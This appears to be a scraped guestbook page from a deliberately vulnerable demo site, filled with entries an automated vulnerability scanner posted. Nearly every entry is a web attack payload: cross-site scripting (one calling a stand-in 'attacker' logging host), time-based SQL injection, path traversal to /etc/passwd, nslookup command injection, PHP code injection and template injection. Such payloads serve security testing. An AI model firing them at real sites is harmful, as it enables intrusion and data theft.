e [116.113.93.82] 2020-10-28 22:10:24

1

e [create] 2020-10-28 22:10:24

1

e [1'"] 2020-10-28 22:10:24

1

e [116.113.93.82] 2020-10-28 22:10:24

testasp.vulnweb.com

e [http://hitjjHOvAO4yM.bxss.me/] 2020-10-28 22:10:24

1

e [create] 2020-10-28 22:10:23

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:10:23

1

e [116.113.93.82] 2020-10-28 22:10:23

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [116.113.93.82] 2020-10-28 22:10:22

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:10:22

1

e [116.113.93.82] 2020-10-28 22:10:22

Http://testasp.vulnweb.com/t/fit.txt

e [116.113.93.82] 2020-10-28 22:10:21

1

e [116.113.93.82] 2020-10-28 22:10:21

1

e [116.113.93.82] 2020-10-28 22:10:21

1

e [116.113.93.82] 2020-10-28 22:10:20

1some_inexistent_file_with_long_name.jpg

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 22:10:20

1

e [116.113.93.82] 2020-10-28 22:10:20

^(#$!@#$)(()))******

e [116.113.93.82] 2020-10-28 22:10:20

1

e [WEB-INF\web.xml] 2020-10-28 22:10:19

1

e [116.113.93.82] 2020-10-28 22:10:19

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [116.113.93.82] 2020-10-28 22:10:19

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 22:10:19

1

e [WEB-INF/web.xml] 2020-10-28 22:10:18

1

e [116.113.93.82] 2020-10-28 22:10:18

)

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 22:10:18

1

e [116.113.93.82] 2020-10-28 22:10:17

1

e [/WEB-INF/web.xml] 2020-10-28 22:10:17

1

e [116.113.93.82] 2020-10-28 22:10:16

'"()

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 22:10:16

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 22:10:16

1

e [116.113.93.82] 2020-10-28 22:10:15

Array

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 22:10:15

1

e [file:///etc/passwd] 2020-10-28 22:10:15

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 22:10:15

1

e [116.113.93.82] 2020-10-28 22:10:15

1&n905405=v974209

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 22:10:14

1

e [^(#$!@#$)(()))******] 2020-10-28 22:10:14

1

e [..] 2020-10-28 22:10:14

1

e [116.113.93.82] 2020-10-28 22:10:13

Array

e [116.113.93.82] 2020-10-28 22:10:13

1

e [!(()&&!|*|*|] 2020-10-28 22:10:13

1

e ['"()] 2020-10-28 22:10:13

1

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 22:10:12

1

e [116.113.93.82] 2020-10-28 22:10:12

1

e [116.113.93.82] 2020-10-28 22:10:12

Array

e [testasp.vulnweb.com] 2020-10-28 22:10:12

1

e [Array] 2020-10-28 22:10:12

1

e [)] 2020-10-28 22:10:12

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 22:10:11

1

e [116.113.93.82] 2020-10-28 22:10:11

12345'"\'\");|]*{ <>

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 22:10:11

1

e [116.113.93.82] 2020-10-28 22:10:11

1

e [acfXJPm6'));select pg_sleep(6); -- ] 2020-10-28 22:10:11

1

e [116.113.93.82&n943194=v911542] 2020-10-28 22:10:10

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 22:10:10

1

e [116.113.93.82] 2020-10-28 22:10:10

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 22:10:10

1

e [Y7H69kJg');select pg_sleep(3); -- ] 2020-10-28 22:10:09

1

e [116.113.93.82] 2020-10-28 22:10:09

1

e [116.113.93.82] 2020-10-28 22:10:09

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 22:10:09

1

e [116.113.93.82] 2020-10-28 22:10:09

${9999525+10000044}

e [116.113.93.82] 2020-10-28 22:10:08

1

e [MDHXsKV1';select pg_sleep(3); -- ] 2020-10-28 22:10:08

1

e [116.113.93.82] 2020-10-28 22:10:08

1

e [%2fetc%2fpasswd] 2020-10-28 22:10:08

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 22:10:08

1

e [116.113.93.82] 2020-10-28 22:10:07

1

e [Y70pudbB'; waitfor delay '0:0:9' -- ] 2020-10-28 22:10:07

1

e [116.113.93.82] 2020-10-28 22:10:07

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [116.113.93.82] 2020-10-28 22:10:07

1

e [${9999756+10000010}] 2020-10-28 22:10:06

1

e [/etc/passwd] 2020-10-28 22:10:06

1

e [1 waitfor delay '0:0:9' -- ] 2020-10-28 22:10:06

1

e [116.113.93.82] 2020-10-28 22:10:06

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 22:10:05

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 22:10:05

1

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 22:10:05

1

e [116.113.93.82] 2020-10-28 22:10:05

1

e [Array] 2020-10-28 22:10:05

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 22:10:05

1

e [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 22:10:04

1

e [Array] 2020-10-28 22:10:04

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 22:10:04

1

e [116.113.93.82] 2020-10-28 22:10:03

&nslookup R5yediqP&'\"`0&nslookup R5yediqP&`'

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 22:10:03

1

e [12345'"\'\");|]*{ <>] 2020-10-28 22:10:02

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 22:10:02

1

e [if(now()=sysdate(),sleep(9),0)] 2020-10-28 22:10:02

1

e [116.113.93.82] 2020-10-28 22:10:02

$(nslookup SgZWQiRw)

e [116.113.93.82] 2020-10-28 22:10:01

NMDJexDC

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 22:10:01

1

e [] 2020-10-28 22:10:01

1

e [-1" OR 2+794-794-1=0+0+0+1 -- ] 2020-10-28 22:10:01

1

e [116.113.93.82] 2020-10-28 22:10:01

set|set&set

e [116.113.93.82] 2020-10-28 22:10:00

"+response.write(9565718*9222264)+"

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 22:10:00

1

e [116.113.93.82] 2020-10-28 22:09:59

'+response.write(9565718*9222264)+'

e [-1' OR 2+575-575-1=0+0+0+1 or 'nIFRYNZF'='] 2020-10-28 22:09:59

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 22:09:59

1

e [srGcB7AV] 2020-10-28 22:09:59

1

e [116.113.93.82] 2020-10-28 22:09:58

response.write(9565718*9222264)

e [-1' OR 2+89-89-1=0+0+0+1 -- ] 2020-10-28 22:09:58

1

e [-1 OR 2+624-624-1=0+0+0+1] 2020-10-28 22:09:57

1

e [-1 OR 2+454-454-1=0+0+0+1 -- ] 2020-10-28 22:09:56

1

e [&nslookup gsmgRktN&'\"`0&nslookup gsmgRktN&`'] 2020-10-28 22:09:55

1

e [ewYZgRID] 2020-10-28 22:09:55

1

e [$(nslookup cKHSywRw)] 2020-10-28 22:09:54

1

e [116.113.93.82] 2020-10-28 22:09:54

1

e [set|set&set] 2020-10-28 22:09:54

1

e ["+response.write(9471146*9891055)+"] 2020-10-28 22:09:52

1

e [116.113.93.82] 2020-10-28 22:09:52

1

e ['+response.write(9471146*9891055)+'] 2020-10-28 22:09:51

1

e [response.write(9471146*9891055)] 2020-10-28 22:09:50

1

e [116.113.93.82] 2020-10-28 22:08:29

1

e [116.113.93.82] 2020-10-28 21:42:44

1

e [116.113.93.82] 2020-10-28 21:42:42

1<eD2w84<

e [116.113.93.82] 2020-10-28 21:42:39

1<img sRc='http://attacker-9993/log.php?

e [116.113.93.82] 2020-10-28 21:42:36

1<feI0TT x=9520>

e [116.113.93.82] 2020-10-28 21:42:33

1<ifRAme sRc=9644.com></IfRamE>

e [116.113.93.82] 2020-10-28 21:42:31

1<WGJGAS>Q1W1G[!+!]</WGJGAS>

e [116.113.93.82] 2020-10-28 21:42:29

1mIww7 <ScRiPt >R0KE(9175)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:42:28

1<% contenteditable onresize=R0KE(9785)>

e [116.113.93.82] 2020-10-28 21:42:26

1}body{acu:Expre/**/SSion(R0KE(9534))}

e [116.113.93.82] 2020-10-28 21:42:24

1<img<!-- --> src=x onerror=alert(9255);//><!-- -->

e [116.113.93.82] 2020-10-28 21:42:22

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 21:42:18

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 21:42:15

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 21:42:13

1<input autofocus onfocus=R0KE(9513)>

e [116.113.93.82] 2020-10-28 21:42:11

e [116.113.93.82] 2020-10-28 21:42:08

1<ScRiPt>R0KE(9858)</sCripT>

e [116.113.93.82] 2020-10-28 21:42:05

1\u003CScRiPt\R0KE(9575)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 21:42:03

%31%3C%53%63%52%69%50%74%20%3E%52%30%4B%45%289635%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 21:42:01

1<img/src=">" onerror=alert(9281)>

e [116.113.93.82] 2020-10-28 21:41:58

1<img src=xyz OnErRor=R0KE(9379)>

e [116.113.93.82] 2020-10-28 21:41:55

1<img src=//testasp.vulnweb.com/t/dot.gif onload=R0KE(9493)>

e [116.113.93.82] 2020-10-28 21:41:52

1<body onload=R0KE(9584)>

e [116.113.93.82] 2020-10-28 21:41:49

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9256'>

e [116.113.93.82] 2020-10-28 21:41:46

1<isindex type=image src=1 onerror=R0KE(9660)>

e [116.113.93.82] 2020-10-28 21:41:44

1<svg

e [116.113.93.82] 2020-10-28 21:41:42

1<video><source onerror="javascript:R0KE(9155)">

e [116.113.93.82] 2020-10-28 21:41:39

1<ScRiPt >R0KE(9567)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:41:36

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9982></ScRiPt>

e [116.113.93.82] 2020-10-28 21:41:33

1<ScRiPt >R0KE(9452)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:41:31

1<ScR<ScRiPt>IpT>R0KE(9764)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 21:41:28

1<script>R0KE(9516)</script>

e [116.113.93.82] 2020-10-28 21:41:25

1<WDQZLJ>OC8EX[!+!]</WDQZLJ>

e [116.113.93.82] 2020-10-28 21:41:23

1<ScRiPt >R0KE(9675)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:41:20

{{9999274*9999692}}

e [116.113.93.82] 2020-10-28 21:41:17

acux10081

e [116.113.93.82] 2020-10-28 21:41:14

acu8868<s1﹥s2ʺs3ʹuca8868

e [116.113.93.82] 2020-10-28 21:41:12

19514946

e [116.113.93.82] 2020-10-28 21:41:09

'"()&%<acx><ScRiPt >R0KE(9929)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:41:06

1'"()&%<acx><ScRiPt >R0KE(9058)</ScRiPt>

e [116.113.93.82<UsO8ll<] 2020-10-28 21:41:01

1

e [116.113.93.82<img sRc='http://attacker-9741/log.php?] 2020-10-28 21:40:58

1

e [116.113.93.82<ElJFQR x=9884>] 2020-10-28 21:40:56

1

e [116.113.93.82<ifRAme sRc=9558.com></IfRamE>] 2020-10-28 21:40:53

1

e [116.113.93.82<WD3FVK>8ZGZX[!+!]</WD3FVK>] 2020-10-28 21:40:52

1

e [116.113.93.82Ay9E4 <ScRiPt >R0KE(9323)</ScRiPt>] 2020-10-28 21:40:48

1

e [116.113.93.82<% contenteditable onresize=R0KE(9811)>] 2020-10-28 21:40:46

1

e [116.113.93.82}body{acu:Expre/**/SSion(R0KE(9345))}] 2020-10-28 21:40:43

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9985);//><!-- -->] 2020-10-28 21:40:41

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 21:40:38

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 21:40:36

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 21:40:33

1

e [116.113.93.82<input autofocus onfocus=R0KE(9907)>] 2020-10-28 21:40:32

1

e [] 2020-10-28 21:40:29

1

e [116.113.93.82<ScRiPt>R0KE(9627)</sCripT>] 2020-10-28 21:40:26

1

e [116.113.93.82\u003CScRiPt\R0KE(9774)\u003C/sCripT\u003E] 2020-10-28 21:40:23

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%52%30%4B%45%289555%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 21:40:22

1

e [116.113.93.82<img/src=">" onerror=alert(9671)>] 2020-10-28 21:40:19

1

e [116.113.93.82<img src=xyz OnErRor=R0KE(9675)>] 2020-10-28 21:40:16

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=R0KE(9207)>] 2020-10-28 21:40:13

1

e [116.113.93.82<body onload=R0KE(9972)>] 2020-10-28 21:40:12

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9922'>] 2020-10-28 21:40:09

1

e [116.113.93.82<isindex type=image src=1 onerror=R0KE(9382)>] 2020-10-28 21:40:06

1

e [116.113.93.82] 2020-10-28 21:40:04

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 21:40:04

1

e [116.113.93.82] 2020-10-28 21:40:03

WEB-INF/web.xml

e [116.113.93.82<svg ] 2020-10-28 21:40:03

1

e [116.113.93.82] 2020-10-28 21:40:03

1

e [116.113.93.82] 2020-10-28 21:40:02

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:40:02

XVefwV9Z'));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:40:02

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 21:40:01

iYRrN6lL');select pg_sleep(6); --

e [116.113.93.82<video><source onerror="javascript:R0KE(9524)">] 2020-10-28 21:40:01

1

e [116.113.93.82] 2020-10-28 21:40:01

file:///etc/passwd

e [116.113.93.82] 2020-10-28 21:40:00

3sBoXte2';select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:40:00

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 21:39:59

-1));select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:39:59

..

e [116.113.93.82<ScRiPt >R0KE(9822)</ScRiPt>] 2020-10-28 21:39:58

1

e [116.113.93.82] 2020-10-28 21:39:58

-1);select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:39:58

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 21:39:57

-1;select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:39:57

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 21:39:56

yjvx0Xtk'; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:39:55

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9421></ScRiPt>] 2020-10-28 21:39:55

1

e [116.113.93.82] 2020-10-28 21:39:55

1 waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 21:39:54

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 21:39:54

-1); waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:39:53

/etc/passwd

e [116.113.93.82<ScRiPt >R0KE(9396)</ScRiPt>] 2020-10-28 21:39:53

1

e [116.113.93.82] 2020-10-28 21:39:53

-1; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:39:52

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 21:39:52

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82] 2020-10-28 21:39:52

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:39:52

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

e [116.113.93.82<ScR<ScRiPt>IpT>R0KE(9955)</sCr<ScRiPt>IpT>] 2020-10-28 21:39:51

1

e [116.113.93.82] 2020-10-28 21:39:51

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 21:39:50

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

e [116.113.93.82] 2020-10-28 21:39:50

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:39:49

if(now()=sysdate(),sleep(6),0)

e [116.113.93.82] 2020-10-28 21:39:49

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82<script>R0KE(9611)</script>] 2020-10-28 21:39:48

1

e [116.113.93.82] 2020-10-28 21:39:48

-1" OR 2+757-757-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:39:48

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 21:39:47

-1' OR 2+694-694-1=0+0+0+1 or 'Klz4s6Qf'='

e [116.113.93.82] 2020-10-28 21:39:46

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 21:39:46

-1' OR 2+811-811-1=0+0+0+1 --

e [116.113.93.82<WJHAAU>YPHQG[!+!]</WJHAAU>] 2020-10-28 21:39:45

1

e [116.113.93.82] 2020-10-28 21:39:44

-1 OR 2+460-460-1=0+0+0+1

e [116.113.93.82] 2020-10-28 21:39:44

e [116.113.93.82] 2020-10-28 21:39:43

-1 OR 2+910-910-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:39:43

e [116.113.93.82<ScRiPt >R0KE(9700)</ScRiPt>] 2020-10-28 21:39:43

1

e [116.113.93.82] 2020-10-28 21:39:43

Ye1tlyTe

e [116.113.93.82] 2020-10-28 21:39:42

JyI=

e [116.113.93.82] 2020-10-28 21:39:42

1

e [116.113.93.82] 2020-10-28 21:39:42

@@Zb8yf

e [116.113.93.82] 2020-10-28 21:39:41

1

e [{{10000498*9999088}}] 2020-10-28 21:39:41

1

e [116.113.93.82] 2020-10-28 21:39:40

1

e [116.113.93.82] 2020-10-28 21:39:39

\

e [acux2109] 2020-10-28 21:39:38

1

e [116.113.93.82] 2020-10-28 21:39:38

1'"

e [acu4139<s1﹥s2ʺs3ʹuca4139] 2020-10-28 21:39:35

1

e [116.113.93.829557064] 2020-10-28 21:39:33

1

e [116.113.93.82] 2020-10-28 21:39:32

${@print(md5(acunetix_wvs_security_test))}\

e [116.113.93.82] 2020-10-28 21:39:31

<!--

e [116.113.93.82] 2020-10-28 21:39:31

create/.

e ['"()&%<acx><ScRiPt >R0KE(9097)</ScRiPt>] 2020-10-28 21:39:31

1

e [116.113.93.82] 2020-10-28 21:39:30

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 21:39:30

'"

e [] 2020-10-28 21:39:30

1

e [116.113.93.82] 2020-10-28 21:39:30

create

e [116.113.93.82] 2020-10-28 21:39:29

";print(md5(acunetix_wvs_security_test));$a="

e [] 2020-10-28 21:39:29

1

e [116.113.93.82] 2020-10-28 21:39:29

create

e [116.113.93.82] 2020-10-28 21:39:28

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 21:39:28

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82'"()&%<acx><ScRiPt >R0KE(9718)</ScRiPt>] 2020-10-28 21:39:28

1

e [JyI=] 2020-10-28 21:39:28

1

e [116.113.93.82] 2020-10-28 21:39:28

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 21:39:27

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [116.113.93.82] 2020-10-28 21:39:27

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [116.113.93.82] 2020-10-28 21:39:27

;print(md5(acunetix_wvs_security_test));

e [<!--] 2020-10-28 21:39:27

1

e [@@SfycY] 2020-10-28 21:39:27

1

e [116.113.93.82] 2020-10-28 21:39:26

Http://testasp.vulnweb.com/t/fit.txt

e [WEB-INF\web.xml] 2020-10-28 21:39:26

1

e ['"] 2020-10-28 21:39:26

1

e [116.113.93.82] 2020-10-28 21:39:26

http://hitm1hYmHDIvg.bxss.me/

e [1] 2020-10-28 21:39:25

1

e [/www.vulnweb.com] 2020-10-28 21:39:25

1

e [WEB-INF/web.xml] 2020-10-28 21:39:25

1

e [116.113.93.82] 2020-10-28 21:39:25

1some_inexistent_file_with_long_name.jpg

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 21:39:25

1

e [\] 2020-10-28 21:39:24

1

e [create/.] 2020-10-28 21:39:24

1

e [116.113.93.82] 2020-10-28 21:39:24

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [/WEB-INF/web.xml] 2020-10-28 21:39:24

1

e [116.113.93.82] 2020-10-28 21:39:23

^(#$!@#$)(()))******

e [1'"] 2020-10-28 21:39:23

1

e [create] 2020-10-28 21:39:23

1

e [http://hituPPLk1dYVD.bxss.me/] 2020-10-28 21:39:23

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 21:39:23

1

e [116.113.93.82] 2020-10-28 21:39:23

!(()&&!|*|*|

e [create] 2020-10-28 21:39:22

1

e [file:///etc/passwd] 2020-10-28 21:39:22

1

e [116.113.93.82] 2020-10-28 21:39:22

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:39:22

1

e [116.113.93.82] 2020-10-28 21:39:22

)

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 21:39:21

1

e [116.113.93.82] 2020-10-28 21:39:21

1

e [116.113.93.82] 2020-10-28 21:39:21

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:39:21

1

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 21:39:21

1

e [116.113.93.82] 2020-10-28 21:39:21

Array

e [116.113.93.82] 2020-10-28 21:39:21

'"()

e [..] 2020-10-28 21:39:20

1

e [S1TUDBAm'));select pg_sleep(9); -- ] 2020-10-28 21:39:20

1

e [116.113.93.82] 2020-10-28 21:39:20

Array

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 21:39:20

1

e [116.113.93.82] 2020-10-28 21:39:19

Array

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 21:39:19

1

e [2duSj1bM');select pg_sleep(6); -- ] 2020-10-28 21:39:19

1

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 21:39:19

1

e [116.113.93.82] 2020-10-28 21:39:18

1&n986837=v913167

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 21:39:18

1

e [116.113.93.82] 2020-10-28 21:39:18

12345'"\'\");|]*{ <>

e [Ag6cJrVT';select pg_sleep(6); -- ] 2020-10-28 21:39:18

1

e [testasp.vulnweb.com] 2020-10-28 21:39:18

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:39:18

1

e [^(#$!@#$)(()))******] 2020-10-28 21:39:17

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 21:39:17

1

e [116.113.93.82] 2020-10-28 21:39:17

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 21:39:17

1

e [rwrc9oJG'; waitfor delay '0:0:3' -- ] 2020-10-28 21:39:17

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 21:39:17

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:39:16

1

e [!(()&&!|*|*|] 2020-10-28 21:39:16

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 21:39:16

1

e ['"()] 2020-10-28 21:39:16

1

e [%2fetc%2fpasswd] 2020-10-28 21:39:16

1

e [1 waitfor delay '0:0:3' -- ] 2020-10-28 21:39:16

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 21:39:16

1

e [)] 2020-10-28 21:39:15

1

e [Array] 2020-10-28 21:39:15

1

e [/etc/passwd] 2020-10-28 21:39:15

1

e [(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/] 2020-10-28 21:39:15

1

e [116.113.93.82&n905314=v967139] 2020-10-28 21:39:15

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 21:39:15

1

e [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 21:39:13

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 21:39:13

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 21:39:13

1

e [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 21:39:13

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 21:39:13

1

e [116.113.93.82] 2020-10-28 21:39:13

1

e [116.113.93.82] 2020-10-28 21:39:12

&nslookup VEQgDgCz&'\"`0&nslookup VEQgDgCz&`'

e [Array] 2020-10-28 21:39:12

1

e [116.113.93.82] 2020-10-28 21:39:12

${10000494+9999090}

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 21:39:12

1

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 21:39:12

1

e [116.113.93.82] 2020-10-28 21:39:12

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [116.113.93.82] 2020-10-28 21:39:12

$(nslookup YJtkMOp4)

e [Array] 2020-10-28 21:39:12

1

e [116.113.93.82] 2020-10-28 21:39:12

"+response.write(9739096*9696726)+"

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 21:39:11

1

e [-1" OR 2+214-214-1=0+0+0+1 -- ] 2020-10-28 21:39:11

1

e [116.113.93.82] 2020-10-28 21:39:11

set|set&set

e [12345'"\'\");|]*{ <>] 2020-10-28 21:39:11

1

e [116.113.93.82] 2020-10-28 21:39:11

'+response.write(9739096*9696726)+'

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 21:39:10

1

e [${9999882+10000084}] 2020-10-28 21:39:10

1

e [-1' OR 2+774-774-1=0+0+0+1 or '4Eiq6s0x'='] 2020-10-28 21:39:10

1

